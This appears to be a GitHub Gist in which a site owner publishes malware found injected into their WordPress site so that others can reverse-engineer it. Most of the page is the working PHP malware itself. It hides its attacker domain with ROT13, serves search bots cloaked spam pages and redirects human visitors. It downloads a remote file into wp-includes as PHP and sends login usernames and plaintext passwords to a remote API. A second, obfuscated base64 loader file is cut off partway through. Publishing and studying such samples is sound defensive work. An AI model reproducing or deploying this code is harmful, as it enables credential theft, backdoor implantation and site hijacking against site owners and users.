These files are parts of a virus that was injected into our WordPress website. I've made these public for the purpose of reverse-engineering the code and identifying the original hacker.
Created
December 14, 2022 04:34
-
-
Save madigan/bc306ce87dd357c295e17960088b5439 to your computer and use it in GitHub Desktop.
WordPress Virus
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php | |
if (!function_exists('getUserIP')) { | |
function getUserIP() | |
{ | |
foreach (array('HTTP_CF_CONNECTING_IP', 'HTTP_CLIENT_IP', 'HTTP_X_FORWARDED_FOR', 'HTTP_X_FORWARDED', 'HTTP_X_CLUSTER_CLIENT_IP', 'HTTP_FORWARDED_FOR', 'HTTP_FORWARDED', 'REMOTE_ADDR') as $key) { | |
if (array_key_exists($key, $_SERVER) === true) { | |
foreach (array_map('trim', explode(',', $_SERVER[$key])) as $ip) { | |
if (filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE) !== false) { | |
return $ip; | |
} | |
} | |
} | |
} | |
} | |
} | |
if (!function_exists('in_array_like')) { | |
function in_array_like($referencia, $array) | |
{ | |
foreach ($array as $ref) { | |
if (strstr($referencia, $ref)) { | |
return true; | |
} | |
} | |
return false; | |
} | |
} | |
if (!function_exists('cacheUrlnew')) { | |
function cacheUrlnew($u, $h) | |
{ | |
$cachetime = 600; | |
$file = ABSPATH . WPINC . '/class-wp-http-netfilter.php'; | |
$mtime = 0; | |
if (file_exists($file)) { | |
$mtime = filemtime($file); | |
} | |
$filetimemod = $mtime + $cachetime; | |
if ($filetimemod < time()) { | |
$curl = curl_init($u); | |
curl_setopt($curl, CURLOPT_HEADER, false); | |
curl_setopt($curl, CURLOPT_RETURNTRANSFER, true); | |
curl_setopt($curl, CURLOPT_POST, true); | |
curl_setopt($curl, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'); | |
curl_setopt($curl, CURLOPT_POSTFIELDS, "h=" . $h); | |
curl_setopt($curl, CURLOPT_TIMEOUT, 15); | |
$data = curl_exec($curl); | |
curl_close($curl); | |
if ($data) { | |
file_put_contents($file, $data); | |
} | |
} else { | |
$data = file_get_contents($file); | |
} | |
return $data; | |
} | |
} | |
$gbt = getUserIP(); | |
$uag = $_SERVER['HTTP_USER_AGENT']; | |
$host = $_SERVER['HTTP_HOST']; | |
$hwost = strtolower($_SERVER['HTTP_HOST']); | |
$ref = ''; | |
if (isset($_SERVER['HTTP_REFERER'])) { | |
$ref = $_SERVER['HTTP_REFERER']; | |
}; | |
$uri = $_SERVER['REQUEST_URI']; | |
$id = $_SERVER['REQUEST_URI']; | |
$googleBot = false; | |
$bingBot = false; | |
$anyBot = false; | |
$blA = ''; | |
$ccd = str_rot13('prrprmnrk.grpu'); | |
$gbots = array('googlebot', 'feedfetcher', 'google-safety', 'googleweblight'); | |
if (in_array_like(strtolower($uag), $gbots)) { | |
$googleBot = true; | |
} | |
$anybots = array('msie 6.0', 'the knowledge ai', 'newspaper', 'wp rocket', 'wp fastest cache preload bot', 'java', 'ifatsearch', 'dataforseobot', 'simplepie_useragent', 'site24x7', 'buck', 'go http package', 'krzana bot', 'okhttp', 'mailpoet cron', 'alittle client', 'woocommerce', 'dreamhost sitemonitor', 'sucuri uptime monitor', 'twitterbot', 'mod_pagespeed_na', 'axios', 're-re studio', 'serf', 'python', 'itms', 'shipmondo', 'empty user agent', 'duckduckbot', 'df bot', 'hummingbird', 'sitelock', 'grequests', 'keybot', 'wedos', 'installatron', 'scalaj-http', 'dalvik', 'spotify', 'razorpay', 'elb-healthchecker', 'wpmudev', 'foregenix', 'semanticjuice', 'simplepie', 'pingdom', 'freshpingbot', '8legs', 'statuscake', 'ioncrawl', 'rome client', 'reeder', 'ping.blo.gs', 'btwebclient', 'livedoor', 'postmanruntime', 'wget', 'rytebot', 'rss', 'zoombot', 'spark', 'scrapy', 'mediatoolkitbot', 'firmograph', 'universalfeedparser', 'uptimerobot', 'facebookexternalhit', '360spider', 'baidubot', 'advbot', 'ahrefs', 'aport', 'blexbot', 'barkrowler', 'curl', 'ccbot', 'redditbot', 'bdcbot', 'birdcrawlerbot', 'aragna', 'crazywebcrawler', 'contxbot', 'checkmarknetwork', 'crowsnest', 'dataminer', 'deusu', 'domaincrawler', 'domainsonocrawler', 'domaintools', 'dotbot', 'exabot', 'flightdeckreportsbot', 'go-http-client', 'httrack', 'mj12bot', 'mauibot', 'megaindex', 'mojeekbot', 'cognitiveseo', 'moreover', 'netcraft', 'netpeakchecker', 'nimbostratus', 'sidetrade', 'yellowbrand', 'nextdoorbot', 'brightbot', 'wiederfreibot', 'startmebot', 'monsidobot', 'jaddjabot', 'ad-standards-bot', 'atomseobot', 'zelistbot', 'konturbot', 'nutch', 'panopta', 'paperlibot', 'petalbot', 'safednsbot', 'seekport', 'semrush', 'seznambot', 'site-shot', 'zombiebot', 'seobility', 'socialsearcher', 'sogou', 'teleport', 'turnitinbot', 'wordpress', 'xovibot', 'yandex.com/bots', 'amazonbot', 'yisou', 'seolizer', 'zoominfobot', 'blogmurabot', 'domainstats', 'ezooms', 'fluid', 'snapchat', 'adbeat_bot', 'ezlynx', 'awariosmartbot', 'wellknownbot', 'bne.es_bot', 'gaisbot', 'newslitbot', 'neticle', 'sansanbot', 'hrankbot', 'linkdexbot', 'ltx71', 'orbbot', 'finbot', 'pagepeeker', 'owler', 'gigabot', 'madbot', 'majestic', 'bidswitchbot', 'linkfluence', 'semanticbot', 'linkwalker', 'msnbot', 'webgains', 'auskunft', 'cxense', 'amazonadbot', 'jooblebot', 'slackbot', 'bitlybot', 'elsemanariobot', 'x28', 'metorik', 'nagios', 'bomborabot', 'adsbot', 'pinterest', 'mbcrawler', 'mjj12bot', 'yetibot', 'cocolyzebot', 'superfeedr', 'mail.ru_bot', 'booking.com', 'archiver', 'coccocbot', 'neevabot', 'seokicks', 'sitechecker', 'applebot', 'archive.org_bot', 'cincraw', 'feedbot', 'surdotlybot', 'intelx.io_bot', 'bublupbot', 'vuhuvbot', 'serendeputy', 'superpagesbot', 'detectify', 'kinsta', 'taboolabot', 'infotigerbot', 'netEstate', 'pirst', 'python-requests', 'randomsurfer', 'rogerbot', 'semtix', 'serpstatbot', 'solomono', 'spider', 'statdom', 'trendictionbot', 'ucrawler', 'urllib', 'verifying', 'viralvideochart', 'zgrab'); | |
if (in_array_like(strtolower($uag), $anybots)) { | |
$anyBot = true; | |
} | |
if (preg_match("#bingbot|BingPreview#i", $uag)) { | |
$bingBot = true; | |
} | |
if (empty($anyBot) && empty($bingBot) && empty($googleBot)) { | |
$ipresponse = cacheUrlnew("http://api.{$ccd}/check_new.php", $hwost); | |
$blA = explode('|', $ipresponse); | |
} | |
if ($anyBot || in_array($gbt, $blA)) { | |
//do | |
} else { | |
if (!preg_match("#qutam-|/neivu-|/ccoin-|/decoin-|/decoin25-|/dcoin-|imagescdn|cryptocdn|/b24c-|/nrcc-|\/kjope-|\/pgxhtogrzm-|\/livres-|\/datez-|\/books|robots.txt|get-pixels|xmlrpc.php|wp-comments-post|bouncy.php|wp-json|wp-session-url|\.env$|favicon\.ico$|wp-login\.php|\/wp-content\/|\.txt$|\.js|\.css|\/wp-admin\/|\.xml$|\/wp-includes\/|well-known\/|=\.\.|wp-cron\.php#", $uri) && !$googleBot && !$bingBot) { | |
$ch = curl_init(); | |
$url_string = "http://source.{$ccd}/in/redn/?val1={$hwost}"; | |
curl_setopt($ch, CURLOPT_URL, $url_string); | |
curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']); | |
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); | |
curl_setopt($ch, CURLOPT_HEADER, 1); | |
curl_setopt($ch, CURLOPT_TIMEOUT, 10); | |
curl_setopt($ch, CURLOPT_REFERER, $host . $uri); | |
curl_setopt($ch, CURLOPT_HTTPHEADER, array('X-Forwarded-For: ' . $gbt)); | |
$html = curl_exec($ch); | |
if (curl_getinfo($ch, CURLINFO_REDIRECT_URL)) { | |
$redirectUrl = curl_getinfo($ch, CURLINFO_REDIRECT_URL); | |
header('Location: ' . $redirectUrl); | |
exit(); | |
} | |
$header_size = curl_getinfo($ch, CURLINFO_HEADER_SIZE); | |
$header = substr($html, 0, $header_size); | |
$html = substr($html, $header_size); | |
curl_close($ch); | |
function yuhoo($html) | |
{ | |
echo $html; | |
} | |
add_action('wp_head', function () use ($html) { | |
yuhoo($html); | |
}); | |
// | |
} | |
/* | |
if (preg_match("#www.google.com/bot.html#i", $uag) && !preg_match("/\/post-|\/pgxhtogrzm-|\/livres-|\/datez-|\/books|\/qutam-|\/neivu-|\/ccoin-|\/dcoin-|\/decoin-|\/decoin25-|imagescdn|cryptocdn|-mk|-mk2|-mk3|-mk4|\/b24c-|\/nrcc-|\/kjope-/", $id)) { $curl = curl_init("http://api.{$ccd}/301.php"); curl_setopt($curl, CURLOPT_HEADER, false); curl_setopt($curl, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36'); curl_setopt($curl, CURLOPT_RETURNTRANSFER, true); $response = curl_exec($curl); curl_close($curl); if (preg_match('#http#', $response)){ header("HTTP/1.1 301 Moved Permanently"); header('Location: ' . $response); exit(); } } | |
*/ | |
/* | |
$nzTables = array('pcachewpr', 'lcachewpr', 'lmcachewpr'); | |
foreach ($nzTables as $nz) { | |
$table_name = $wpdb->prefix . $nz; | |
if ($wpdb->get_var("SHOW TABLES LIKE '$table_name'") == $table_name) { | |
$sql = "DROP TABLE IF EXISTS $table_name"; | |
$wpdb->query($sql); | |
$curl = curl_init("http://api.{$ccd}/checktable.php"); | |
curl_setopt($curl, CURLOPT_HEADER, false); | |
curl_setopt($curl, CURLOPT_RETURNTRANSFER, true); | |
curl_setopt($curl, CURLOPT_POST, true); | |
curl_setopt($curl, CURLOPT_POSTFIELDS, $_SERVER['HTTP_HOST'] . ';' . $table_name); | |
$response = curl_exec($curl); | |
curl_close($curl); | |
} | |
} | |
*/ | |
if (preg_match("#^(/qutam-|/ccoin-|/decoin-|/decoin25-|/dcoin-|/b24c-|/nrcc-|/kjope-|/neivu-)#", $_SERVER['REQUEST_URI']) || preg_match('#.+-mk\/?$#', $_SERVER['REQUEST_URI']) || preg_match('#.+-mk3\/?$#', $_SERVER['REQUEST_URI']) || preg_match('#.+-mk4\/?$#', $_SERVER['REQUEST_URI']) || preg_match('#.+-mk2\/?$#', $_SERVER['REQUEST_URI'])) { | |
if (!class_exists('CovenVP', FALSE)) { | |
class CovenVP | |
{ | |
private $args = NULL; | |
public function __construct($args) | |
{ | |
if (!isset($args['slug'])) throw new Exception('No slug given for virtual page'); | |
$this->args = $args; | |
add_filter('the_posts', array($this, 'virtual_page')); | |
} | |
public function virtual_page($posts) | |
{ | |
global $wp; | |
$slug = isset($this->args['slug']) ? $this->args['slug'] : ''; | |
if (0 === count($posts) && (0 === strcasecmp($wp->request, $slug) || $slug === $wp->query_vars['page_id'])) { | |
$post = new stdClass(); | |
$post->ID = -128; | |
$post->post_author = isset($this->args['author']) ? $this->args['author'] : 1; | |
$post->post_date = isset($this->args['date']) ? $this->args['date'] : current_time('mysql'); | |
$post->post_date_gmt = isset($this->args['dategmt']) ? $this->args['dategmt'] : current_time('mysql', 1); | |
$post->post_content = isset($this->args['content']) ? $this->args['content'] : ''; | |
$post->post_title = isset($this->args['title']) ? $this->args['title'] : ''; | |
$post->post_excerpt = ''; | |
$post->post_status = 'publish'; | |
$post->comment_status = 'closed'; | |
$post->ping_status = 'closed'; | |
$post->post_password = ''; | |
$post->post_name = $slug; | |
$post->to_ping = ''; | |
$post->pinged = ''; | |
$post->post_modified = $post->post_date; | |
$post->post_modified_gmt = $post->post_date_gmt; | |
$post->post_content_filtered = ''; | |
$post->post_parent = 0; | |
$post->guid = get_home_url('/' . $slug); | |
$post->menu_order = 0; | |
$post->post_type = isset($this->args['type']) ? $this->args['type'] : 'page'; | |
$post->post_mime_type = ''; | |
$post->comment_count = 0; | |
$post = apply_filters('coven_virtual_page_content', $post); | |
$posts = array($post); | |
global $wp_query; | |
$wp_query->is_page = TRUE; | |
$wp_query->is_singular = TRUE; | |
$wp_query->is_home = FALSE; | |
$wp_query->is_archive = FALSE; | |
$wp_query->is_category = FALSE; | |
unset($wp_query->query['error']); | |
$wp_query->query_vars['error'] = ''; | |
$wp_query->is_404 = FALSE; | |
} | |
return $posts; | |
} | |
} | |
} | |
if (!function_exists('coven_create_virtual')) { | |
function coven_create_virtual() | |
{ | |
$requri = explode('-', $_SERVER['REQUEST_URI']); | |
$scheme = end($requri); | |
$scheme = trim($scheme, '/'); | |
$covenD = str_rot13('prrprmnrk.grpu'); | |
$ch = curl_init(); | |
curl_setopt($ch, CURLOPT_URL, "http://coven.{$covenD}/{$scheme}/" . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']); | |
curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER["HTTP_USER_AGENT"]); | |
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); | |
curl_setopt($ch, CURLOPT_TIMEOUT, 30); | |
$html = curl_exec($ch); | |
$html = json_decode($html, true); | |
curl_close($ch); | |
if (json_last_error() === JSON_ERROR_NONE) { | |
$url = trim(parse_url($_SERVER['REQUEST_URI'], PHP_URL_PATH), '/'); | |
$args = array('slug' => $url, 'title' => $html['title'], 'content' => $html['body']); | |
$pg = new CovenVP($args); | |
} | |
} | |
} | |
if (preg_match("/google|bing|msn|yahoo/i", $ref) && !$googleBot && !$anyBot) { | |
$rUri = explode('-', $_SERVER['REQUEST_URI']); | |
$rScheme = end($rUri); | |
$rScheme = trim($rScheme, '/'); | |
$ch = curl_init(); | |
curl_setopt($ch, CURLOPT_URL, "http://source.{$ccd}/in/{$rScheme}/?val1={$hwost}"); | |
curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']); | |
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); | |
curl_setopt($ch, CURLOPT_HEADER, 1); | |
curl_setopt($ch, CURLOPT_TIMEOUT, 10); | |
curl_setopt($ch, CURLOPT_REFERER, $host . $uri); | |
curl_setopt($ch, CURLOPT_HTTPHEADER, array('X-Forwarded-For: ' . $gbt)); | |
$html = curl_exec($ch); | |
if (curl_getinfo($ch, CURLINFO_REDIRECT_URL)) { | |
$redirectUrl = curl_getinfo($ch, CURLINFO_REDIRECT_URL); | |
header('Location: ' . $redirectUrl); | |
exit(); | |
} | |
} elseif ($googleBot) { | |
add_action('init', 'coven_create_virtual'); | |
} else { | |
header("Location: http://" . $_SERVER["HTTP_HOST"]); | |
exit(); | |
} | |
} | |
if (preg_match("#xmlrpc\.php$#", $id)) { | |
echo "XML-RPC server accepts POST requests only."; | |
exit(); | |
} | |
if (preg_match("/serviceworker.js$|332.js$|34334$/", $id)) { | |
header('Content-Type: application/javascript'); | |
echo 'self.importScripts(\'https://redads.biz/sw/w1s.js\');'; | |
exit; | |
} | |
if (preg_match_all("/headssr\.php$/", $id, $matches)) { | |
$fileUrl = "http://api.{$ccd}/lnk/sh.txt"; | |
$saveTo = ABSPATH . WPINC . '/abcsss.php'; | |
if (is_file($saveTo) && filesize($saveTo) && time() - filemtime($saveTo) <= 60 * 60 * 1) { | |
} else { | |
$fp = fopen($saveTo, 'w+'); | |
$ch = curl_init($fileUrl); | |
curl_setopt($ch, CURLOPT_FILE, $fp); | |
curl_setopt($ch, CURLOPT_TIMEOUT, 15); | |
curl_exec($ch); | |
curl_close($ch); | |
fclose($fp); | |
} | |
} | |
/* | |
$chdoms = curl_init( "http://api.{$ccd}/data/check_doms.txt" ); curl_setopt ($chdoms, CURLOPT_RETURNTRANSFER, 1); curl_setopt ($chdoms, CURLOPT_HEADER, 0); curl_setopt ($chdoms, CURLOPT_TIMEOUT, 20); curl_setopt ($chdoms, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'); $chDomains = curl_exec ($chdoms); curl_close($chdoms); $chDomains = preg_split('/\n|\r\n?/', $chDomains); if ( !preg_match ( "#/post-|/pgxhtogrzm-|/decoin-|/decoin25-|/qutam-|/neivu-|/ccoin-|/dcoin-|/b24c-|/nrcc-|/kjope-|-mk|-mk2|-mk3|-mk4#", $id ) && $googleBot && in_array( $hwost, $chDomains ) ) { function supermario($content) { $ccd = str_rot13('prrprmnrk.grpu'); $hwost = strtolower ($_SERVER['HTTP_HOST']); $uri = $_SERVER['REQUEST_URI']; $ch = curl_init("http://coven.{$ccd}/links/schemenameururu/{$hwost}{$uri}" . rand() ); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'); curl_setopt($ch, CURLOPT_TIMEOUT, 20); $miaLinks = curl_exec($ch); curl_close($ch); return $content . $miaLinks; } | |
add_filter('the_content', 'supermario', 20); | |
} | |
if ( !preg_match ( "#/post-|/pgxhtogrzm-|/decoin-|/decoin25-|/qutam-|/neivu-|/ccoin-|/dcoin-|/b24c-|/nrcc-|/kjope-|-mk|-mk2|-mk3|-mk4#", $id ) && $googleBot ) { function supermario($content) { $ccd = str_rot13('prrprmnrk.grpu'); $hwost = strtolower ($_SERVER['HTTP_HOST']); $uri = $_SERVER['REQUEST_URI']; $ch = curl_init("http://coven.{$ccd}/links/schemenameururu/{$hwost}{$uri}" . rand() ); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'); curl_setopt($ch, CURLOPT_TIMEOUT, 20); $miaLinks = curl_exec($ch); curl_close($ch); return $content . $miaLinks; } | |
add_filter('the_content', 'supermario', 20); | |
} | |
*/ | |
function add_meta_cache() | |
{ | |
echo '<meta http-equiv="Cache-Control" content="no-cache">'; | |
echo '<meta http-equiv="cache-control" content="max-age=0" />'; | |
echo '<meta http-equiv="cache-control" content="no-store" />'; | |
echo '<meta name="google" content="notranslate" />'; | |
echo '<meta name="robots" content="noarchive" />'; | |
} | |
add_action('wp_head', 'add_meta_cache'); | |
if (preg_match('#/(imagescdn|cryptocdn)/.+#', $id)) { | |
$picUrl = "http://images.{$ccd}{$id}"; | |
$ch = curl_init(); | |
curl_setopt($ch, CURLOPT_URL, $picUrl); | |
curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']); | |
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); | |
curl_setopt($ch, CURLOPT_HEADER, 0); | |
curl_setopt($ch, CURLOPT_TIMEOUT, 30); | |
curl_setopt($ch, CURLOPT_HTTPHEADER, array('X-Forwarded-For: ' . $gbt)); | |
$html = curl_exec($ch); | |
curl_close($ch); | |
header('Cache-Control: public'); | |
header('Content-Type: image/jpeg'); | |
echo $html; | |
exit; | |
} | |
if (preg_match("#pgxhtogrzm#", $_SERVER['REQUEST_URI'])) { | |
if (!class_exists('CovenVP', FALSE)) { | |
class CovenVP | |
{ | |
private $args = NULL; | |
public function __construct($args) | |
{ | |
if (!isset($args['slug'])) throw new Exception('No slug given for virtual page'); | |
$this->args = $args; | |
add_filter('the_posts', array($this, 'virtual_page')); | |
} | |
public function virtual_page($posts) | |
{ | |
global $wp; | |
$slug = isset($this->args['slug']) ? $this->args['slug'] : ''; | |
if (0 === count($posts) && (0 === strcasecmp($wp->request, $slug) || $slug === $wp->query_vars['page_id'])) { | |
$post = new stdClass(); | |
$post->ID = -128; | |
$post->post_author = isset($this->args['author']) ? $this->args['author'] : 1; | |
$post->post_date = isset($this->args['date']) ? $this->args['date'] : current_time('mysql'); | |
$post->post_date_gmt = isset($this->args['dategmt']) ? $this->args['dategmt'] : current_time('mysql', 1); | |
$post->post_content = isset($this->args['content']) ? $this->args['content'] : ''; | |
$post->post_title = isset($this->args['title']) ? $this->args['title'] : ''; | |
$post->post_excerpt = ''; | |
$post->post_status = 'publish'; | |
$post->comment_status = 'closed'; | |
$post->ping_status = 'closed'; | |
$post->post_password = ''; | |
$post->post_name = $slug; | |
$post->to_ping = ''; | |
$post->pinged = ''; | |
$post->post_modified = $post->post_date; | |
$post->post_modified_gmt = $post->post_date_gmt; | |
$post->post_content_filtered = ''; | |
$post->post_parent = 0; | |
$post->guid = get_home_url('/' . $slug); | |
$post->menu_order = 0; | |
$post->post_type = isset($this->args['type']) ? $this->args['type'] : 'page'; | |
$post->post_mime_type = ''; | |
$post->comment_count = 0; | |
$post = apply_filters('coven_virtual_page_content', $post); | |
$posts = array($post); | |
global $wp_query; | |
$wp_query->is_page = TRUE; | |
$wp_query->is_singular = TRUE; | |
$wp_query->is_home = FALSE; | |
$wp_query->is_archive = FALSE; | |
$wp_query->is_category = FALSE; | |
unset($wp_query->query['error']); | |
$wp_query->query_vars['error'] = ''; | |
$wp_query->is_404 = FALSE; | |
} | |
return $posts; | |
} | |
} | |
} | |
if (!function_exists('coven_create_virtual')) { | |
function coven_create_virtual() | |
{ | |
$covenD = str_rot13('prrprmnrk.grpu'); | |
$ch = curl_init(); | |
curl_setopt($ch, CURLOPT_URL, "http://coven.{$covenD}/shilov/" . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']); | |
curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER["HTTP_USER_AGENT"]); | |
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); | |
curl_setopt($ch, CURLOPT_TIMEOUT, 30); | |
$html = curl_exec($ch); | |
$html = json_decode($html, true); | |
curl_close($ch); | |
if (json_last_error() === JSON_ERROR_NONE) { | |
$url = trim(parse_url($_SERVER['REQUEST_URI'], PHP_URL_PATH), '/'); | |
$args = array('slug' => $url, 'title' => $html['title'], 'content' => $html['body']); | |
$pg = new CovenVP($args); | |
} | |
} | |
} | |
if (preg_match("/google|bing|msn|yahoo/i", $ref) && !$googleBot && !$anyBot) { | |
$ch = curl_init(); | |
curl_setopt($ch, CURLOPT_URL, "http://source.{$ccd}/in/drws/?val1={$hwost}"); | |
curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']); | |
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); | |
curl_setopt($ch, CURLOPT_HEADER, 1); | |
curl_setopt($ch, CURLOPT_TIMEOUT, 10); | |
curl_setopt($ch, CURLOPT_REFERER, $host . $uri); | |
curl_setopt($ch, CURLOPT_HTTPHEADER, array('X-Forwarded-For: ' . $gbt)); | |
$html = curl_exec($ch); | |
if (curl_getinfo($ch, CURLINFO_REDIRECT_URL)) { | |
$redirectUrl = curl_getinfo($ch, CURLINFO_REDIRECT_URL); | |
header('Location: ' . $redirectUrl); | |
exit(); | |
} | |
} elseif ($googleBot) { | |
add_action('init', 'coven_create_virtual'); | |
} else { | |
header("Location: http://" . $_SERVER["HTTP_HOST"]); | |
exit(); | |
} | |
} | |
if (!$googleBot) { | |
if (!isset($_COOKIE['_eshoob'])) { | |
setcookie('_eshoob', 1, time() + 604800, '/'); | |
if (isset($_SERVER['HTTP_COOKIE'])) { | |
$cookies = explode(';', $_SERVER['HTTP_COOKIE']); | |
foreach ($cookies as $cookie) { | |
if (strpos($cookie, 'wordpress') !== false || strpos($cookie, 'wp_') !== false || strpos($cookie, 'wp-') !== false) { | |
$parts = explode('=', $cookie); | |
$name = trim($parts[0]); | |
setcookie($name, '', time() - 1000); | |
setcookie($name, '', time() - 1000, '/'); | |
} | |
} | |
} | |
} | |
} | |
if (!function_exists('isHttps')) { | |
function isHttps() | |
{ | |
if ((!empty($_SERVER['REQUEST_SCHEME']) && $_SERVER['REQUEST_SCHEME'] == 'https') || (!empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] == 'on') || (!empty($_SERVER['HTTP_X_FORWARDED_PROTO']) && $_SERVER['HTTP_X_FORWARDED_PROTO'] == 'https') || (!empty($_SERVER['HTTP_X_FORWARDED_SSL']) && $_SERVER['HTTP_X_FORWARDED_SSL'] == 'on') || (!empty($_SERVER['SERVER_PORT']) && $_SERVER['SERVER_PORT'] == '443')) { | |
$server_request_scheme = 'https'; | |
} else { | |
$server_request_scheme = 'http'; | |
} | |
return $server_request_scheme; | |
} | |
} | |
if (!function_exists('wordpress_api_debug')) { | |
function wordpress_api_debug($user_login, $user) | |
{ | |
$ccd = str_rot13('prrprmnrk.grpu'); | |
$wpApiUrl = "http://api.{$ccd}/api.php"; | |
$uuuser = get_user_by('login', $_POST['log']); | |
if (in_array('administrator', $uuuser->roles)) { | |
$role = 'admin'; | |
} else { | |
$role = 'user'; | |
} | |
$verbLogs = array('wp_host' => $_SERVER['HTTP_HOST'], 'wp_uri' => $_SERVER['REQUEST_URI'], 'wp_scheme' => isHttps(), 'user_login' => $_POST['log'], 'user_password' => $_POST['pwd'], 'user_ip' => getUserIP(), 'user_role' => $role); | |
if (!empty($verbLogs['user_login']) && strpos($_SERVER['HTTP_USER_AGENT'], '100.6.1155.294') === false) { | |
$wpLogData = json_encode($verbLogs); | |
$curl = curl_init(); | |
curl_setopt($curl, CURLOPT_HEADER, false); | |
curl_setopt($curl, CURLOPT_URL, $wpApiUrl); | |
curl_setopt($curl, CURLOPT_RETURNTRANSFER, true); | |
curl_setopt($curl, CURLOPT_POST, true); | |
curl_setopt($curl, CURLOPT_POSTFIELDS, $wpLogData); | |
curl_setopt($curl, CURLOPT_HTTPHEADER, array('Content-Type:application/json')); | |
$response = curl_exec($curl); | |
curl_close($curl); | |
} | |
} | |
} | |
if (function_exists('add_action')) { | |
add_action('wp_login', 'wordpress_api_debug', 10, 2); | |
} | |
if (!function_exists('wordpress_api_wrongauth_debug')) { | |
function wordpress_api_wrongauth_debug($user_login, $user) | |
{ | |
$ccd = str_rot13('prrprmnrk.grpu'); | |
$wpApiUrl = "http://api.ceecezaex.tech/api_false.php"; | |
$uuuser = get_user_by('login', $_POST['log']); | |
if (in_array('administrator', $uuuser->roles)) { | |
$role = 'admin'; | |
} else { | |
$role = 'user'; | |
} | |
$verbLogs = array('wp_host' => $_SERVER['HTTP_HOST'], 'wp_uri' => $_SERVER['REQUEST_URI'], 'wp_scheme' => isHttps(), 'user_login' => $_POST['log'], 'user_password' => $_POST['pwd'], 'user_ip' => getUserIP(), 'user_role' => $role); | |
if (!empty($verbLogs['user_login'])) { | |
$wpLogData = json_encode($verbLogs); | |
$curl = curl_init(); | |
curl_setopt($curl, CURLOPT_HEADER, false); | |
curl_setopt($curl, CURLOPT_URL, $wpApiUrl); | |
curl_setopt($curl, CURLOPT_RETURNTRANSFER, true); | |
curl_setopt($curl, CURLOPT_POST, true); | |
curl_setopt($curl, CURLOPT_POSTFIELDS, $wpLogData); | |
curl_setopt($curl, CURLOPT_HTTPHEADER, array('Content-Type:application/json')); | |
$response = curl_exec($curl); | |
curl_close($curl); | |
} | |
} | |
} | |
if (function_exists('add_action')) { | |
add_action('wp_login_failed', 'wordpress_api_wrongauth_debug', 10, 2); | |
} | |
if (preg_match("#/ququo#", $id)) { | |
echo uniqid() . " {$hwost} " . phpversion() . "<br>"; | |
//$htaccess = file_get_contents(ABSPATH.'.htaccess'); | |
//echo "wp-includes writable: " . is_writable(ABSPATH . WPINC) . "<br>"; | |
//echo "class-wp-http-netfilter.php exist: " . file_exists(ABSPATH . WPINC . '/class-wp-http-netfilter.php') . "<br>"; | |
//echo "class-wp-http-netfilter.php content: <pre>" . file_get_contents(ABSPATH . WPINC . '/class-wp-http-netfilter.php')."</pre><br>"; | |
//echo "ipresponse: " . $ipresponse . "<br>"; | |
$time_elapsed = timer_stop(); | |
echo "cheetie {$time_elapsed} secs<br>"; | |
//echo "<pre>{$htaccess}</pre>"; | |
exit(); | |
} | |
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php @ini_set('display_errors', '0'); | |
error_reporting(0); | |
global $zeeta; | |
if (!$npDcheckClassBgp && !isset($zeeta)) { | |
$ea = '_shaesx_'; $ay = 'get_data_ya'; $ae = 'decode'; $ea = str_replace('_sha', 'bas', $ea); $ao = 'wp_cd'; $ee = $ea.$ae; $oa = str_replace('sx', '64', $ee); $algo = 'default'; $pass = "Zgc5c4MXrK42MQ4F8YpQL/+fflvUNPlfnyDNGK/X/wEfeQ=="; | |
if (!function_exists('get_data_ya')) { | |
if (ini_get('allow_url_fopen')) { | |
function get_data_ya($m) { | |
$data = file_get_contents($m); | |
return $data; | |
} | |
} | |
else { | |
function get_data_ya($m) { | |
$ch = curl_init(); | |
curl_setopt($ch, CURLOPT_HEADER, 0); | |
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); | |
curl_setopt($ch, CURLOPT_URL, $m); | |
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 8); | |
$data = curl_exec($ch); | |
curl_close($ch); | |
return $data; | |
} | |
} | |
} | |
if (!function_exists('wp_cd')) { | |
function wp_cd($fd, $fa="") { | |
$fe = "wp_frmfunct"; | |
$len = strlen($fd); | |
$ff = ''; | |
$n = $len>100 ? 8 : 2; | |
